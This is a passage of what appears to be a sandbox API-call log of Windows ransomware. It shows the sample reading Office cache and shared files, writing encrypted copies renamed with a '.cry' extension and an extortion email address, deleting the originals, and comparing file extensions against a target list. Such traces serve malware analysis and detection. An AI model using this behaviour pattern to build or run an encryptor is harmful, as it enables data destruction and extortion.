lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0036.249] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xee, lpOverlapped=0x0) returned 1 [0036.250] SetEndOfFile (hFile=0x1a0) returned 1 [0036.250] CloseHandle (hObject=0x1a0) returned 1 [0036.250] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.250] SetEndOfFile (hFile=0x184) returned 1 [0036.251] CloseHandle (hObject=0x184) returned 1 [0036.251] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.251] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 1 [0036.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0036.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0036.252] lstrlenW (lpString=".doc") returned 4 [0036.252] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.252] lstrlenW (lpString=".docx") returned 5 [0036.252] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0036.252] lstrlenW (lpString=".pdf") returned 4 [0036.252] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.252] lstrlenW (lpString=".xls") returned 4 [0036.252] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.252] lstrlenW (lpString=".xlsx") returned 5 [0036.252] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0036.252] lstrlenW (lpString=".ppt") returned 4 [0036.252] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0036.252] lstrlenW (lpString=".zip") returned 4 [0036.252] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.252] lstrlenW (lpString=".rar") returned 4 [0036.252] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.252] lstrlenW (lpString=".bz2") returned 4 [0036.252] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.252] lstrlenW (lpString=".7z") returned 3 [0036.252] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0036.252] lstrlenW (lpString=".dbf") returned 4 [0036.252] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0036.252] lstrlenW (lpString=".1cd") returned 4 [0036.252] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0036.252] lstrlenW (lpString=".jpg") returned 4 [0036.252] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0036.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0036.253] lstrlenW (lpString=".doc") returned 4 [0036.253] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.253] lstrlenW (lpString=".docx") returned 5 [0036.253] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0036.253] lstrlenW (lpString=".pdf") returned 4 [0036.253] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.253] lstrlenW (lpString=".xls") returned 4 [0036.253] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.253] lstrlenW (lpString=".xlsx") returned 5 [0036.253] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0036.253] lstrlenW (lpString=".ppt") returned 4 [0036.253] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0036.253] lstrlenW (lpString=".zip") returned 4 [0036.253] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.253] lstrlenW (lpString=".rar") returned 4 [0036.253] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.253] lstrlenW (lpString=".bz2") returned 4 [0036.253] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.253] lstrlenW (lpString=".7z") returned 3 [0036.253] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0036.253] lstrlenW (lpString=".dbf") returned 4 [0036.253] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0036.253] lstrlenW (lpString=".1cd") returned 4 [0036.253] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0036.253] lstrlenW (lpString=".jpg") returned 4 [0036.253] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.254] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0036.254] lstrlenW (lpString="Setup.xml") returned 9 [0036.254] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0036.254] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=2624) returned 1 [0036.254] CloseHandle (hObject=0x184) returned 1 [0036.254] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0036.254] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.254] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0036.255] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.255] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.255] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0036.255] GetLastError () returned 0x0 [0036.255] ReadFile (in: hFile=0x184, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0xa40, lpOverlapped=0x0) returned 1 [0036.312] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xa50, lpOverlapped=0x0) returned 1 [0036.313] ReadFile (in: hFile=0x184, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0036.313] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0036.313] SetEndOfFile (hFile=0x1a0) returned 1 [0036.313] CloseHandle (hObject=0x1a0) returned 1 [0036.314] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.314] SetEndOfFile (hFile=0x184) returned 1 [0036.314] CloseHandle (hObject=0x184) returned 1 [0036.314] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.315] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0036.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.315] lstrlenW (lpString=".doc") returned 4 [0036.315] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.315] lstrlenW (lpString=".docx") returned 5 [0036.315] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.315] lstrlenW (lpString=".pdf") returned 4 [0036.315] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.315] lstrlenW (lpString=".xls") returned 4 [0036.315] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.315] lstrlenW (lpString=".xlsx") returned 5 [0036.315] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.315] lstrlenW (lpString=".ppt") returned 4 [0036.315] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.315] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.315] lstrlenW (lpString=".zip") returned 4 [0036.315] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.315] lstrlenW (lpString=".rar") returned 4 [0036.315] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.315] lstrlenW (lpString=".bz2") returned 4 [0036.315] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.315] lstrlenW (lpString=".7z") returned 3 [0036.316] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.316] lstrlenW (lpString=".dbf") returned 4 [0036.316] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.316] lstrlenW (lpString=".1cd") returned 4 [0036.316] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.316] lstrlenW (lpString=".jpg") returned 4 [0036.316] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.316] lstrlenW (lpString=".doc") returned 4 [0036.316] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.316] lstrlenW (lpString=".docx") returned 5 [0036.316] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.316] lstrlenW (lpString=".pdf") returned 4 [0036.316] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.316] lstrlenW (lpString=".xls") returned 4 [0036.316] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.316] lstrlenW (lpString=".xlsx") returned 5 [0036.316] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.316] lstrlenW (lpString=".ppt") returned 4 [0036.316] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.316] lstrlenW (lpString=".zip") returned 4 [0036.316] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.316] lstrlenW (lpString=".rar") returned 4 [0036.316] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.316] lstrlenW (lpString=".bz2") returned 4 [0036.316] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.316] lstrlenW (lpString=".7z") returned 3 [0036.316] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.317] lstrlenW (lpString=".dbf") returned 4 [0036.317] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.317] lstrlenW (lpString=".1cd") returned 4 [0036.317] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.317] lstrlenW (lpString=".jpg") returned 4 [0036.317] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.317] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0036.317] lstrlenW (lpString="ProPlusrWW.xml") returned 14 [0036.317] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0037.132] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=16852) returned 1 [0037.132] CloseHandle (hObject=0x1a4) returned 1 [0037.132] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 0x2020 [0037.132] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0037.133] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0037.133] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0037.133] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0037.133] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0037.133] GetLastError () returned 0x0 [0037.133] ReadFile (in: hFile=0x1a4, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x41d4, lpOverlapped=0x0) returned 1 [0037.395] WriteFile (in: hFile=0x19c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x41e0, lpOverlapped=0x0) returned 1 [0037.396] ReadFile (in: hFile=0x1a4, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0037.396] WriteFile (in: hFile=0x19c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xf0, lpOverlapped=0x0) returned 1 [0037.397] SetEndOfFile (hFile=0x19c) returned 1 [0037.397] CloseHandle (hObject=0x19c) returned 1 [0037.397] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0037.397] SetEndOfFile (hFile=0x1a4) returned 1 [0037.398] CloseHandle (hObject=0x1a4) returned 1 [0037.398] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0037.398] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 1 [0037.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.399] lstrlenW (lpString=".doc") returned 4 [0037.399] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.399] lstrlenW (lpString=".docx") returned 5 [0037.399] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.399] lstrlenW (lpString=".pdf") returned 4 [0037.399] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.399] lstrlenW (lpString=".xls") returned 4 [0037.399] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.399] lstrlenW (lpString=".xlsx") returned 5 [0037.399] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.399] lstrlenW (lpString=".ppt") returned 4 [0037.399] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.399] lstrlenW (lpString=".zip") returned 4 [0037.399] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.399] lstrlenW (lpString=".rar") returned 4 [0037.399] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.399] lstrlenW (lpString=".bz2") returned 4 [0037.399] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.399] lstrlenW (lpString=".7z") returned 3 [0037.399] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.399] lstrlenW (lpString=".dbf") returned 4 [0037.399] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.399] lstrlenW (lpString=".1cd") returned 4 [0037.399] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.399] lstrlenW (lpString=".jpg") returned 4 [0037.399] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.400] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.400] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.400] lstrlenW (lpString=".doc") returned 4 [0037.400] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.400] lstrlenW (lpString=".docx") returned 5 [0037.400] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.400] lstrlenW (lpString=".pdf") returned 4 [0037.400] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.400] lstrlenW (lpString=".xls") returned 4 [0037.400] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.400] lstrlenW (lpString=".xlsx") returned 5 [0037.400] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.400] lstrlenW (lpString=".ppt") returned 4 [0037.400] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.400] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.400] lstrlenW (lpString=".zip") returned 4 [0037.400] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.400] lstrlenW (lpString=".rar") returned 4 [0037.400] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.400] lstrlenW (lpString=".bz2") returned 4 [0037.400] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.400] lstrlenW (lpString=".7z") returned 3 [0037.400] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.400] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.400] lstrlenW (lpString=".dbf") returned 4 [0037.400] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.400] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.400] lstrlenW (lpString=".1cd") returned 4 [0037.400] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.400] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 77 [0037.400] lstrlenW (lpString=".jpg") returned 4 [0037.400] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.401] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0037.401] lstrlenW (lpString="MS.GIF") returned 6 [0037.401] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0037.459] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1069) returned 1 [0037.460] CloseHandle (hObject=0x184) returned 1 [0037.460] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif")) returned 0x20 [0037.460] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0037.460] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0037.460] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0037.460] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0037.460] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0037.460] GetLastError () returned 0x0 [0037.460] ReadFile (in: hFile=0x184, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x42d, lpOverlapped=0x0) returned 1 [0037.490] WriteFile (in: hFile=0x17c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: 